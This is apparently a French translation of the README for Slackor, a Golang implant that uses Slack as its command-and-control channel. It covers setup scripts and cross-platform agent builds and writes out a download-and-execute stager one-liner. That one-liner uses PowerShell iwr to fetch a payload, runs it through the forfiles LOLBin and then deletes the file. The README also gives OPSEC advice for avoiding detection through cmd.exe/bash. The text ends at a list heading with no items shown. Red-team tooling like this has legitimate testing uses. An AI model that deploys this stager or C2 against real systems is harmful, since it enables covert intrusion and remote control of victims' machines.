
Un implant Golang qui utilise Slack comme serveur de commande et de contrôle.
Maintenu sur https://github.com/n00py/Slackor
Un implant Golang qui utilise Slack comme canal de commande et de contrôle.
Ce projet s'est inspiré de Gcat et Twittor.
Cet outil est publié à titre de preuve de concept. Assurez-vous de lire et de comprendre la politique de développement des applications Slack avant de créer des applications Slack.
Remarque : Le serveur est écrit en Python 3
Pour que cela fonctionne, vous avez besoin de :
Un espace de travail Slack
Enregistrer une application avec les permissions suivantes :
Créer un bot
Ce dépôt contient cinq fichiers :
install.sh Installe les dépendancessetup.py Le script pour créer les canaux Slack, la base de données et l'implantagent.py Script pour générer de nouveaux implantsserver.py Le serveur Slackor, conçu pour être exécuté sur Linuxagent.go L'implant Golangrequirements.txt Dépendances Python (installées automatiquement)Pour commencer :
go get github.com/Coalfire-Research/Slackorcd $GOPATH/src/github.com/Coalfire-Research/Slackorinstall.shsetup.py
Après avoir exécuté le script avec succès, plusieurs fichiers seront créés dans le répertoire dist/ :
agent.windows.exe : Windows binaire 64 bitsagent.upx.exe : Windows binaire 64 bits, compressé avec UPXagent.darwin : macOS binaire 64 bitsagent.32.linux : Linux binaire 32 bitsagent.64.linux : Linux binaire 64 bitsAprès avoir démarré server.py sur un hôte Linux, exécutez l'agent approprié ci-dessus pour votre hôte cible.
Exécutez le module "stager" pour générer une commande en une ligne et d'autres droppers.
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe
Cela exécutera InvokeWebRequest (PS v.3+) pour télécharger la charge utile, l'exécutera en utilisant un LOLBin, et se supprimera après avoir été tué. C'est un exemple fonctionnel mais la commande peut être modifiée pour utiliser une autre méthode de téléchargement ou d'exécution.
Tapez "help" ou appuyez sur [TAB] pour voir la liste des commandes disponibles. Tapez "help [COMMAND]" pour voir la description de cette commande.
(Slackor)
Une fois qu'un agent se connecte, vous pouvez interagir avec lui. Utilisez "interact [AGENT]" pour entrer dans une invite de l'agent. Tapez "help" ou appuyez sur [TAB] pour voir la liste des commandes disponibles.
(Slackor:AGENT)
Les sorties de commandes et les fichiers téléchargés sont chiffrés en AES en plus du chiffrement de transport TLS de Slack.
Les modules vous avertiront avant d'effectuer des tâches qui écrivent sur le disque.
Lors de l'exécution de commandes shell, notez que cmd.exe/bash sera exécuté. Cela peut être surveillé sur l'hôte.
Voici plusieurs commandes sûres pour l'OPSEC qui N'exécuteront PAS cmd.exe/bash :